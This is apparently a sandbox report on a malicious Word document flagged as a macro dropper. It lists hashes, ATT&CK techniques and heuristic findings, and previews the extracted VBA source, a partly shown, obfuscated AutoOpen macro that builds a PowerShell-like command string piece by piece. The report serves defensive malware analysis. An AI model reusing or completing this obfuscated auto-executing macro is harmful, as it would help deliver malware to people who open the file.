Office (OLE) malware analysis — malicious · 25edbc83f140eafc

MALICIOUS

Office (OLE)

391.5 KB Created: 2018-10-05 03:41:00 Authoring application: Microsoft Office Word First seen: 2019-01-11

MD5: 6106fc132736a323bfae474fcb1fd08b SHA-1: c45d7269e740752df954359f789c4973dd16b63b SHA-256: 25edbc83f140eafc75cfa8c97b4913cb6153f55d97681d17550bd0b8c709cb01

290 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1059 Command and Scripting Interpreter T1566.001 Spearphishing Attachment T1203 Exploitation for Client Execution

The sample is a malicious Office document containing a VBA macro with an AutoOpen subroutine. This macro utilizes Shell() and CreateObject() calls, and attempts to construct a string that appears to be a URL or command. The heuristic 'SE_CLIPBOARD_COMMAND_LURE' indicates the document may instruct the user to paste content into a shell, further suggesting malicious intent. The ClamAV detection 'Doc.Dropper.Agent-7079654-0' confirms its classification as a dropper.

Heuristics 9

ClamAV: Doc.Dropper.Agent-7079654-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Dropper.Agent-7079654-0
VBA macros detected medium 4 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
CreateObject call high OLE_VBA_CREATEOBJ

CreateObject call
Environ() call (env variable access) low OLE_VBA_ENVIRON

Environ() call (env variable access)
Clipboard command execution lure high SE_CLIPBOARD_COMMAND_LURE

Document tells the user to copy or paste clipboard content into Run, PowerShell, cmd, or another shell-like execution context
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
URL http://www.w3.org/1999/02/22-rdf-syntax-ns# In document text (OLE body)
- http://ns.adobe.com/xap/1.0/In document text (OLE body)
- http://purl.org/dc/elements/1.1/In document text (OLE body)
- http://ns.adobe.com/xap/1.0/mm/In document text (OLE body)
- http://ns.adobe.com/xap/1.0/sType/ResourceEvent#In document text (OLE body)
- http://ns.adobe.com/xap/1.0/sType/ResourceRef#In document text (OLE body)
- http://ns.adobe.com/photoshop/1.0/In document text (OLE body)
- http://ns.adobe.com/tiff/1.0/In document text (OLE body)
- http://ns.adobe.com/exif/1.0/In document text (OLE body)
- http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 69386 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	69386 bytes
SHA-256: `2c6bf572a5548ceee6fa0a0b3e42f766afcfb997a58d493736644d37b5f472e1`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Name = "NewMacros" Function iueif() MsgBox "" End Function Sub AutoOpen() Const iizeokv09 = False Const kbwsfc_o = False Const wrnoshw_f = False Const uo_aj = False Const ygcmwa = True Const iutaysc0 = False Const ykjrgcpko07 = False If 29 * 88 = 6229 Then Const kdaaxv8 = True Const frzifyi22 = True Const utzik = False Const usrivkbt = False Const iedvrld = False Const ayrra = True Const vrms_uuue = False ElseIf 26 - 30 = -4 Then edj_kel63 = "$oaibfxvjiowlxxw_iekfpfyiu" Else Const ixziidc = True Const nqiyvlnjo = False Const auen = False Const dgaae3 = True Const aavkdi = True Const amgbzzfee5 = True Const eya_y = True Const kzxqxl = False End If Select Case "oxg_uvfet" Case fb_yepwoy88 Const oh_esbg = True Const pd_yixk = False Const uwpnrw_yu = True Case 10687 Const mpiqlja = True Const kgukqt = False Const iefqrke6 = True Case "oxg_uvfet" cfxl_gfv = "uoycid='org/C" edj_kel63 = edj_kel63 + cfxl_gfv End Select Const iy_cntgsm = False Select Case "sxnrui" Case iiaxsqezu Const ipfdayz = False Case "sxnrui" evpyiai = "J';$n" Const dukh_a = False Const iv_iwb = False edj_kel63 = yaby + edj_kel63 + evpyiai + oahtaaa30 Case 20072 Const zmoeio = False End Select Const acugley4 = True Select Case 81 * 88 Case 7128 anooioa = "atpxmhofkbbeb_huseu" edj_kel63 = edj_kel63 + anooioa + vqton End Select Select Case 15 - 36 Case -21 edj_kel63 = edj_kel63 + "eei='ojqa';$owaizbpyuao" + ixcei End Select If 71 - 38 = 33 Then kbezdzzytq = edj_kel63 Const uepe02 = False y_qhab = "yyawtzcwqygabpqs" kbezdzzytq = ev_vrz + kbezdzzytq + y_qhab End If Const twwfkh_sym = False Select Case "uoaoyvr_j" Case "uoaoyvr_j" kbezdzzytq = hajsds + kbezdzzytq + "rqeeidno4=' =';$eikoia_yblegbmybniemxea_ogwepz" + xdiab End Select Const psiakke = True Select Case 32 - 88 Case -56 iauah50 = "='e]$ojqa0';$mdroaen" kbezdzzytq = kbezdzzytq + iauah50 End Select Select Case "fzur95" Case "fzur95" puugo = "b_esuwo='ient).';$w" kbezdzzytq = ajvgf_pxsvpo + kbezdzzytq + puugo + zhjwh End Select Const lcwao = False Select Case 54 + 62 Case acnqf_cdq Const snovlglksy0 = False Const kcc_dgp = False Const uitloclo = True Case 116 gmuoalb = "vmbvwoxkjuhj" kbezdzzytq = kbezdzzytq + gmuoalb End Select Const atujhsfo = False Select Case "uonbxia" Case "uonbxia" kbezdzzytq = xayjh + kbezdzzytq + "t='($env:a';$mzoiuddeyaj" Case 25741 Const udcuyugx = True Const zyneoe = False End Select If 76 * 76 = 5776 Then wft_ewhmncs = eidryso + kbezdzzytq Const fnoodljwk = False xuhiouy = "lqncmnrvpotqghzbopauau='($';$tco" wft_ewhmncs = uydhm_dx + wft_ewhmncs + xuhiouy + oqgnsyjxv Else End If Const xiqvwh = False Const zshjcccwm = False If 35 * 9 = 315 Then okixpzcsjw00 = wft_ewhmncs Const rvjqaglo = True Const wochoeu = True yupexujf = "zygiwfcyinfvnu" okixpzcsjw00 = okixpzcsjw00 + yupexujf End If Const zqrtv = False If 17 - 6 = 23 Then ElseIf 90 - 18 = 72 Then aqcyi = nckgw + okixpzcsjw00 Const oeoznne = True vnopuaqenz6 = "_euqaocnlecylzi='br" aqcyi = aqcyi + vnopuaqenz6 + a_rgzwur Else End If If 56 - 49 = 7 Then aqcyi = aqcyi + "';$q" End If Const yeuea = True If 2219 >= 7013 Then Const nocvezb = True Const oqptte = True Const mftti = False Const ywau45 = True Const aprgt = False Const dgyaa = False Else t_rpssijwpl = Environ("SystemRoot") End If Const iqkmdt28 = True If 9919 < 1932 Then Const xdtbea = False Const aiwob = True Const tdmczx = True Const ctp_zke = False Const pvigvpsei = False Const wlm_drj = True Const ubwobxoxj = True ElseIf 5087 < 7189 Then phyktrv = aqcyi Const eeee_e = True uaegz = "cyeatbinwxsmezc_h" phyktrv = phyktrv + uaegz Else Const zltot3 = False Const ekwgejdr = True Const oftudd = True ... (truncated)

SHA-256: 2c6bf572a5548ceee6fa0a0b3e42f766afcfb997a58d493736644d37b5f472e1

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "NewMacros"
Function iueif()
MsgBox ""
End Function
Sub AutoOpen()
Const iizeokv09 = False
Const kbwsfc_o = False
Const wrnoshw_f = False
Const uo_aj = False
Const ygcmwa = True
Const iutaysc0 = False
Const ykjrgcpko07 = False

If 29 * 88 = 6229 Then
Const kdaaxv8 = True
Const frzifyi22 = True
Const utzik = False
Const usrivkbt = False
Const iedvrld = False
Const ayrra = True
Const vrms_uuue = False
ElseIf 26 - 30 = -4 Then
edj_kel63 = "$oaibfxvjiowlxxw_iekfpfyiu"
Else
Const ixziidc = True
Const nqiyvlnjo = False
Const auen = False
Const dgaae3 = True
Const aavkdi = True
Const amgbzzfee5 = True
Const eya_y = True
Const kzxqxl = False
End If
Select Case "oxg_uvfet"
Case fb_yepwoy88
Const oh_esbg = True
Const pd_yixk = False
Const uwpnrw_yu = True
Case 10687
Const mpiqlja = True
Const kgukqt = False
Const iefqrke6 = True
Case "oxg_uvfet"
cfxl_gfv = "uoycid='org/C"
edj_kel63 = edj_kel63 + cfxl_gfv
End Select
Const iy_cntgsm = False

Select Case "sxnrui"
Case iiaxsqezu
Const ipfdayz = False
Case "sxnrui"
evpyiai = "J';$n"
Const dukh_a = False
Const iv_iwb = False
edj_kel63 = yaby + edj_kel63 + evpyiai + oahtaaa30
Case 20072
Const zmoeio = False
End Select
Const acugley4 = True

Select Case 81 * 88
Case 7128
anooioa = "atpxmhofkbbeb_huseu"
edj_kel63 = edj_kel63 + anooioa + vqton
End Select
Select Case 15 - 36
Case -21
edj_kel63 = edj_kel63 + "eei='ojqa';$owaizbpyuao" + ixcei
End Select
If 71 - 38 = 33 Then
kbezdzzytq = edj_kel63
Const uepe02 = False
y_qhab = "yyawtzcwqygabpqs"
kbezdzzytq = ev_vrz + kbezdzzytq + y_qhab
End If
Const twwfkh_sym = False

Select Case "uoaoyvr_j"
Case "uoaoyvr_j"
kbezdzzytq = hajsds + kbezdzzytq + "rqeeidno4=' =';$eikoia_yblegbmybniemxea_ogwepz" + xdiab
End Select
Const psiakke = True

Select Case 32 - 88
Case -56
iauah50 = "='e]$ojqa0';$mdroaen"
kbezdzzytq = kbezdzzytq + iauah50
End Select
Select Case "fzur95"
Case "fzur95"
puugo = "b_esuwo='ient).';$w"
kbezdzzytq = ajvgf_pxsvpo + kbezdzzytq + puugo + zhjwh
End Select
Const lcwao = False

Select Case 54 + 62
Case acnqf_cdq
Const snovlglksy0 = False
Const kcc_dgp = False
Const uitloclo = True
Case 116
gmuoalb = "vmbvwoxkjuhj"
kbezdzzytq = kbezdzzytq + gmuoalb
End Select
Const atujhsfo = False

Select Case "uonbxia"
Case "uonbxia"
kbezdzzytq = xayjh + kbezdzzytq + "t='($env:a';$mzoiuddeyaj"
Case 25741
Const udcuyugx = True
Const zyneoe = False
End Select
If 76 * 76 = 5776 Then
wft_ewhmncs = eidryso + kbezdzzytq
Const fnoodljwk = False
xuhiouy = "lqncmnrvpotqghzbopauau='($';$tco"
wft_ewhmncs = uydhm_dx + wft_ewhmncs + xuhiouy + oqgnsyjxv
Else
End If
Const xiqvwh = False
Const zshjcccwm = False

If 35 * 9 = 315 Then
okixpzcsjw00 = wft_ewhmncs
Const rvjqaglo = True
Const wochoeu = True
yupexujf = "zygiwfcyinfvnu"
okixpzcsjw00 = okixpzcsjw00 + yupexujf
End If
Const zqrtv = False

If 17 - 6 = 23 Then
ElseIf 90 - 18 = 72 Then
aqcyi = nckgw + okixpzcsjw00
Const oeoznne = True
vnopuaqenz6 = "_euqaocnlecylzi='br"
aqcyi = aqcyi + vnopuaqenz6 + a_rgzwur
Else
End If
If 56 - 49 = 7 Then
aqcyi = aqcyi + "';$q"
End If
Const yeuea = True

If 2219 >= 7013 Then
Const nocvezb = True
Const oqptte = True
Const mftti = False
Const ywau45 = True
Const aprgt = False
Const dgyaa = False
Else
t_rpssijwpl = Environ("SystemRoot")
End If
Const iqkmdt28 = True

If 9919 < 1932 Then
Const xdtbea = False
Const aiwob = True
Const tdmczx = True
Const ctp_zke = False
Const pvigvpsei = False
Const wlm_drj = True
Const ubwobxoxj = True
ElseIf 5087 < 7189 Then
phyktrv = aqcyi
Const eeee_e = True
uaegz = "cyeatbinwxsmezc_h"
phyktrv = phyktrv + uaegz
Else
Const zltot3 = False
Const ekwgejdr = True
Const oftudd = True

... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.